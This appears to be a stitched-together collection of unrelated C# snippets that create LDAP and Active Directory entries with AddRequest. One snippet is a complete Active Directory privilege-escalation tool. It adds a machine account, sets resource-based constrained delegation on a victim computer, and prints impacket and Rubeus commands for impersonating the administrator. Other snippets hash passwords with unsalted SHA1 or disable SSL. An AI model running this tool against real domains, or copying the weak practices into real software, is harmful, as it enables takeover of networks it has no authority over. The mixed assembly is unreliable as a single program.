public static AddRequest GetAddRequest(ILdapUser user, string objectClass) { var addReq = new AddRequest {DistinguishedName = user.GetUserDn()}; addReq.Attributes.Add(new DirectoryAttribute("objectClass", objectClass)); addReq.Attributes.Add(new DirectoryAttribute("cn", user.GetUserCn())); addReq.Attributes.Add(new DirectoryAttribute("sn", user.GetUserSn())); foreach (string attributeName in user.GetUserAttributeKeys()) { foreach (string attributeValue in user.GetUserAttribute(attributeName)) { addReq.Attributes.Add(new DirectoryAttribute(attributeName, attributeValue)); } } return addReq; }
public bool LadpAdd(string strOU, DirectoryAttribute[] dirAttrList1) { string strOU1 = strOU + "," + m_TargetOU; AddRequest addRequest = new AddRequest(strOU1, dirAttrList1); m_LdapConnection.SendRequest(addRequest); return true; }
/// <summary> /// Adds a user to the LDAP server database. This method is intentionally less generic than the search one to /// make it easier to add meaningful information to the database. /// </summary> /// <param name="user">The user to add</param> public void addUser(UserModel user) { var sha1 = new SHA1Managed(); var digest = Convert.ToBase64String(sha1.ComputeHash(System.Text.Encoding.UTF8.GetBytes(user.UserPassword))); var request = new AddRequest(user.DN, new DirectoryAttribute[] { new DirectoryAttribute("uid", user.UID), new DirectoryAttribute("ou", user.OU), new DirectoryAttribute("userPassword", "{SHA}" + digest), new DirectoryAttribute("objectClass", new string[] { "top", "account", "simpleSecurityObject" }) }); connection.SendRequest(request); }
public string createUserLdap(User user) { ldapId = new LdapDirectoryIdentifier(HOST, PORT); network = new NetworkCredential(ADMIN, ADMIN_PASS); using (LdapConnection connection = new LdapConnection(ldapId, network, AuthType.Basic)) { try { string[] objectClass = new string[] { "top", "inetOrgPerson", "organizationalPerson", "person" }; connection.SessionOptions.SecureSocketLayer = false; connection.SessionOptions.ProtocolVersion = 3; String dn = DN_CREATE.Replace("{0}", user.email); DirectoryAttributeCollection collection = new DirectoryAttributeCollection() { new DirectoryAttribute("objectclass", objectClass), new DirectoryAttribute("uid",user.email), new DirectoryAttribute("sn", user.lastName), new DirectoryAttribute("cn", user.userName), new DirectoryAttribute("employeeNumber", user.userId), new DirectoryAttribute("departmentNumber", user.userGroup), new DirectoryAttribute("userPassword", user.password) }; AddRequest addMe = new AddRequest(dn, "inetOrgPerson"); addMe.Attributes.AddRange(collection); connection.Bind(); connection.SendRequest(addMe); return "OK"; } catch (LdapException ex) { throw new BusinessException("Ldap error: " + ex.Message); } catch (Exception e) { throw new PlatformException("Ldap error: " + e.Message); } } }
static void Main(string[] args) { if (args.Length < 2) { Usage(); return; } var arguments = new Dictionary <string, string>(); foreach (string argument in args) { int idx = argument.IndexOf('='); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } } if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm")) { Usage(); return; } String DomainController = arguments["dc"]; String Domain = arguments["domain"]; String new_MachineAccount = ""; String new_MachineAccount_password = ""; //添加的机器账户 if (arguments.ContainsKey("ma")) { new_MachineAccount = arguments["ma"]; } else { new_MachineAccount = RandomString(8); } //机器账户密码 if (arguments.ContainsKey("ma")) { new_MachineAccount_password = arguments["mp"]; } else { new_MachineAccount_password = RandomString(10); } String victimcomputer = arguments["tm"];; //需要进行提权的机器 String machine_account = new_MachineAccount; String sam_account = ""; String DistinguishedName = ""; if (machine_account.EndsWith("$")) { sam_account = machine_account; machine_account = machine_account.Substring(0, machine_account.Length - 1); } else { sam_account = machine_account + "$"; } String distinguished_name = DistinguishedName; String victim_distinguished_name = DistinguishedName; String[] DC_array = null; distinguished_name = "CN=" + machine_account + ",CN=Computers"; victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers"; DC_array = Domain.Split('.'); foreach (String DC in DC_array) { distinguished_name += ",DC=" + DC; victim_distinguished_name += ",DC=" + DC; } Console.WriteLine(victim_distinguished_name); Console.WriteLine("[+] Elevate permissions on " + victimcomputer); Console.WriteLine("[+] Domain = " + Domain); Console.WriteLine("[+] Domain Controller = " + DomainController); //Console.WriteLine("[+] Distinguished Name = " + distinguished_name); try{ //连接ldap System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389); //NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录 System.DirectoryServices.Protocols.LdapConnection connection = null; //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc); connection = new System.DirectoryServices.Protocols.LdapConnection(identifier); connection.SessionOptions.Sealing = true; connection.SessionOptions.Signing = true; connection.Bind(); //通过ldap找计算机 System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain); myldapConnection.Path = "LDAP://" + victim_distinguished_name; myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure; System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection); search.Filter = "(CN=" + victimcomputer + ")"; string[] requiredProperties = new string[] { "samaccountname" }; foreach (String property in requiredProperties) { search.PropertiesToLoad.Add(property); } System.DirectoryServices.SearchResult result = null; try { result = search.FindOne(); } catch (System.Exception ex) { Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting..."); return; } //添加机器并设置资源约束委派 if (result != null) { try { var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] { new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain), new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account), new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"), new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")), new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"), new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account) }); //添加机器账户 connection.SendRequest(request); Console.WriteLine("[+] New SAMAccountName = " + sam_account); Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added"); } catch (System.Exception ex) { Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)"); Console.WriteLine("[-] Exception: " + ex.Message); return; } // 获取新计算机对象的SID var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null); var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request); SecurityIdentifier sid = null; foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries) { try { sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0); Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value); } catch { Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting..."); return; } } //设置资源约束委派 String sec_descriptor = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")"; RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor); byte[] buffer = new byte[sd.BinaryLength]; sd.GetBinaryForm(buffer, 0); //测试sddl转换结果 //RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0); //Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All)); // 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中 try { var change_request = new System.DirectoryServices.Protocols.ModifyRequest(); change_request.DistinguishedName = victim_distinguished_name; DirectoryAttributeModification modifymsDS = new DirectoryAttributeModification(); modifymsDS.Operation = DirectoryAttributeOperation.Replace; modifymsDS.Name = "msDS-AllowedToActOnBehalfOfOtherIdentity"; modifymsDS.Add(buffer); change_request.Modifications.Add(modifymsDS); connection.SendRequest(change_request); Console.WriteLine("[+] Exploit successfully!\n"); //打印利用方式 Console.WriteLine("[+] Use impacket to get priv!\n"); Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain); Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache"); Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain); Console.WriteLine("\n\n[+] Use Rubeus.exe to get priv!\n"); Console.WriteLine("\nRubeus.exe hash /user:{0} /password:{1} /domain:{2}", machine_account, new_MachineAccount_password, Domain); Console.WriteLine("\nRubeus.exe s4u /user:{0} /rc4:rc4_hmac /impersonateuser:administrator /msdsspn:cifs/{1}.{2} /ptt /dc:{3}", machine_account, victimcomputer, Domain, DomainController); Console.WriteLine("\npsexec.exe \\\\{0}.{1} cmd ", victimcomputer, Domain); Console.WriteLine("\n[+] Done.."); } catch (System.Exception ex) { Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException); Console.WriteLine("[!] Failed..."); return; } } } catch (System.Exception ex) { Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting..."); return; } }
/// <summary> /// Send all pending changes to the directory service. If there is a pending rename / re-superior, /// it will fire first. /// </summary> /// <param name="ldap"></param> public void CommitChanges(LdapConnection ldap) { CheckForDeletion(); if (this.IsDnDirty) { ModifyDNRequest req = new ModifyDNRequest(); req.DistinguishedName = this.OriginalDn; req.NewName = this.RDN; logger.Info("Request new name {0}", req.NewName); req.DeleteOldRdn = true; if (this.IsSuperiorDirty) { req.NewParentDistinguishedName = this.SuperiorDn; logger.Info("Request new superior {0}", req.NewParentDistinguishedName); } ldap.SendRequest(req); this.IsDnDirty = false; this.IsSuperiorDirty = false; this.OriginalDn = this.DistinguishedName; } if (_changes.Count > 0) { if (this.IsNewEntry) { AddRequest req = new AddRequest(this.DistinguishedName); foreach (DirectoryAttributeModification dm in this.ChangesAsDAMC()) req.Attributes.Add(new DirectoryAttribute(dm.Name, dm.GetValues(typeof(string)))); ldap.SendRequest(req); } else { ModifyRequest req = new ModifyRequest(this.DistinguishedName); foreach (DirectoryAttributeModification dm in this.ChangesAsDAMC()) req.Modifications.Add(dm); ldap.SendRequest(req); } _changes.Clear(); this.IsNewEntry = false; logger.Info("Commit on {0} complete", this.DistinguishedName); } else { logger.Info("Nothing to commit on {0}", this.DistinguishedName); if (this.IsNewEntry) throw new InvalidOperationException( "Cannot commit a new directory object with no attributes"); } }
/// <summary> /// Adds an entry to the LDAP directory with the specified distinguished name and attributes. /// </summary> /// <param name="dn">The distinguished name of the entry to add.</param> /// <param name="attributes">The attributes for the entry to add.</param> /// <returns>True if added, false otherwise.</returns> public bool Add(string dn, DirectoryAttribute[] attributes) { if (!string.IsNullOrWhiteSpace(dn)) { AddRequest request = new AddRequest(dn, attributes); try { AddResponse response = (AddResponse)connection.SendRequest(request); // Check that a response was received. if (response != null) { // A response was received. if (response.ResultCode == ResultCode.Success) { return true; } } else { // A response was not received. return false; } } catch { } } return false; }
/// <summary> /// Crear un nuevo usuario en el ADAM /// </summary> /// <param name="loginName">Nombre de Login</param> /// <param name="fullName">Nombre y Apellido del usuario</param> /// <param name="password">Contraseña</param> /// <returns></returns> public ResultCode CreateUser(string loginName, string fullName, string password) { if (this.UserExist(loginName)) return ResultCode.EntryAlreadyExists; this.OpenConnection(); string dirClasstype = "user"; string userDN = string.Format("CN={0},{1}", loginName, this._usersDistinguishedName); AddRequest addNewUserRequest = new AddRequest(userDN, dirClasstype); AddResponse response = (AddResponse)this._adamConnection.SendRequest(addNewUserRequest); if (response.ResultCode != ResultCode.Success) return response.ResultCode; DirectoryAttributeModification attFullName = new DirectoryAttributeModification(); attFullName.Name = "givenName"; attFullName.Operation = DirectoryAttributeOperation.Add; attFullName.Add(fullName); DirectoryAttributeModification attPassword = new DirectoryAttributeModification(); attPassword.Name = "unicodePwd"; attPassword.Add(GetPasswordData(password)); attPassword.Operation = DirectoryAttributeOperation.Add; DirectoryAttributeModification attDisableAccount = new DirectoryAttributeModification(); attDisableAccount.Name = "msDS-UserAccountDisabled"; attDisableAccount.Add("FALSE"); attDisableAccount.Operation = DirectoryAttributeOperation.Replace; ModifyRequest modRequest = new ModifyRequest(userDN, attFullName, attPassword, attDisableAccount); ModifyResponse modResponse = (ModifyResponse)this._adamConnection.SendRequest(modRequest); if (modResponse.ResultCode != ResultCode.Success) return modResponse.ResultCode; this.CloseConnection(); return modResponse.ResultCode; }